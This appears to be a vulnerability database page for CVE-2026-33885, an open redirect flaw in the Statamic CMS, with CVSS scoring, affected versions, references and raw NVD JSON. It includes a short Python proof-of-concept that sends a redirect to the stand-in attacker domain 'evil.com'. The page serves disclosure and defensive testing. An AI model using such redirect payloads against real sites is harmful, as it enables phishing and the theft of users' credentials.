CVE-2026-33885

Description

Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.16 and 6.7.2, the external URL detection used for redirect validation on unauthenticated endpoints could be bypassed, allowing users to be redirected to external URLs after actions like form submissions and authentication flows. This has been fixed in 5.73.16 and 6.7.2.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:* - VULNERABLE

Statamic CMS < 5.73.16

Statamic CMS < 6.7.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-33885 (Open Redirect)
# This script checks if the redirect parameter can be used to redirect to an external domain.

import requests

def check_open_redirect(target_url, redirect_param):
    # Construct the malicious payload
    payload = {
        redirect_param: "https://evil.com"
    }
    
    try:
        # Send request to the vulnerable endpoint
        response = requests.post(target_url, data=payload, allow_redirects=False, timeout=10)
        
        # Check the Location header for the redirect
        location = response.headers.get('Location', '')
        
        if 'evil.com' in location:
            print(f"[+] Vulnerable! Redirecting to: {location}")
            return True
        else:
            print("[-] Not vulnerable or payload invalid.")
            return False
    except Exception as e:
        print(f"Error: {e}")
        return False

# Example usage
target = "http://vulnerable-site.com/submit" # Replace with actual endpoint
check_open_redirect(target, "redirect")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33885
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33885
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33885/
[4] VulDB https://vuldb.com/cve/CVE-2026-33885
[5] https://github.com/statamic/cms/security/advisories/GHSA-7f74-7q5w-hj4r

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33885", "sourceIdentifier": "[email protected]", "published": "2026-03-27T21:17:25.337", "lastModified": "2026-04-08T14:07:18.793", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.16 and 6.7.2, the external URL detection used for redirect validation on unauthenticated endpoints could be bypassed, allowing users to be redirected to external URLs after actions like form submissions and authentication flows. This has been fixed in 5.73.16 and 6.7.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.73.16", "matchCriteriaId": "EACDC143-742E-4926-9C28-6095690EB549"}, {"vulnerable": true, "criteria": "cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.7.2", "matchCriteriaId": "631FF065-0872-4DC7-AB25-AB74B782A9BE"}]}]}], "references": [{"url": "https://github.com/statamic/cms/security/advisories/GHSA-7f74-7q5w-hj4r", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}